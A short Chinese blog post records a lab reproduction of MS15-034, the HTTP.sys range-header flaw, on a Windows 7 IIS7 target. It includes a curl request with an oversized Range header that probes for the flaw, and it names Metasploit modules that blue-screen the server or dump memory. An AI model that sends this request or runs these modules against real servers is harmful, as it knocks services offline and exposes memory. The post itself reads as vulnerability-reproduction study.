MS15-034復現(xiàn)

漏洞主要影響了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在內(nèi)的主流服務器操作系統(tǒng)。IIS6.0以上。

靶機:win7? iis7

win7安裝好iis服務后訪問80端口,檢測是否存在漏洞:使用curl發(fā)送以下數(shù)據(jù)

curl http://192.168.137.129 -H "Host: 192.168.137.129" -H "Range: bytes=0-18446744073709551615"

當出現(xiàn)Requested Range Not Satisfiable時說明存在漏洞。

使用metasploit的auxiliary/dos/http/ms15_034_ulonglongadd模塊可直接造成服務器藍屏,

使用auxiliary/scanner/http/ms15_034_http_sys_memory_dump模塊檢測時僅針對:windoiws 8.1, 2012, or 2012R2有效。


?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容